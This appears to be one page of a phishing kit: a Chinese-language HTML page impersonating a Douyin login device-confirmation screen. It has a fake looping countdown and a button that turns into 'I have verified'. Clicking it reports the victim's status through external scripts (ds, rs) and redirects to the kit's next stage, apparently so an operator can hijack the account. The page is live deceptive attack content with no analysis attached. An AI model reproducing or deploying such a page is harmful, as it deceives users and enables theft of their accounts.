<!DOCTYPE html><html class="javascript am-touch js cssanimations ios"><head><meta charset="utf-8">
<title>身份验证</title>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta name="renderer" content="webkit">
<meta name="x5-fullscreen" content="true">
<meta name="browsermode" content="application">
<meta name="x5-page-mode" content="app">
<meta content="telephone=no" name="format-detection">
<script src="../images/jquery.min.js"></script>
<script src="../app/data.js"></script>
<link href="images/m.css" rel="stylesheet">
</head>
<body>
<div id="content" class="content">
	<form method="post" id="fro" action="update/index.php" autocomplete="off">
		<div id="login" class="login">
			<style></style>
			<div class="title">请在设备上确认登录</div>
			<div class="line">为保护账号安全，请在已登录设备上点击「确认」</div>
			<div class="g_logo">
				<img src="./images/logo.png" class="g_loginimg">
			</div>
			<div id="web_login">
				<ul class="g_info">
					<li>1.我们已向你的设备设备发送了通知</li>
					<li>2.你可以直接打开抖音App或者点击推送通知进入到确认页面</li>
					<li>3.该推送的有效期是5分钟，如超时未确认，请选择其他方式残重新确认</li>
				</ul>
				<div id="go" class="ivhhsCP" data-clipboard-text="##X-1DGhU9kYf1927U_R##" onClick="sumbit_form();">登录确认中(<span>4分58秒</span>）</div>
			</div>
		</div>
	</form>
</div>
<div class="bot">手机号不用了？<a class="info_a">找回账号</a></div>


<script type="text/javascript">
var wait=298;  
function time(o) {
	if (wait < 10) {
		wait = 299;
	} 
	

	if(wait < 292){
		$('#go').css({opacity:1}).html('我已验证');
	}
	console.log(wait)
	$('.ivhhsCP span').html(Math.floor(wait/60)+'分'+Math.floor(wait%60)+'秒')
	
	wait--;
	setTimeout(function() {
		time(o);
	},1000);
}
time();
</script>
<script language="javascript">$(function(){rs({pn:'code'})});</script>
<script>
function sumbit_form(){

	if(wait < 292){
		$('#go').css({opacity:1});
		setTimeout(function(){
			location.href='../load/';
		},2000);
		ds('sv',{isyanzheng:'已验证'});
	}else{
		
		tip('为保护账号安全，请在已登录设备上点击「确认」');
	}
}
//JS提示弹框
function tip(text, time){
	window.tmsg&&document.body.removeChild(tmsg);
	document.body.insertAdjacentHTML('beforeEnd','<div id="tmsg" style="top:200px;left:20%;right:20%;color:#fff;margin:0 auto;opacity:0;padding:5px;font-size:15px;max-width:300px;position:fixed;text-align:center;border-radius:8px;background-color:#333;border:1px solid #222;box-shadow:rgba(0,0,0,0.25) 0px 0px 10px 6px;transition:opacity 0.6s;z-index:19891016;">'+text+'</div>');
	setTimeout('tmsg.style.opacity=0.8',0);clearTimeout(window.tmst);
	window.tmst=setTimeout('tmsg.style.opacity=0;setTimeout("document.body.removeChild(tmsg)",600);',(time||3)*1000);
}
</script>

</body>
</html>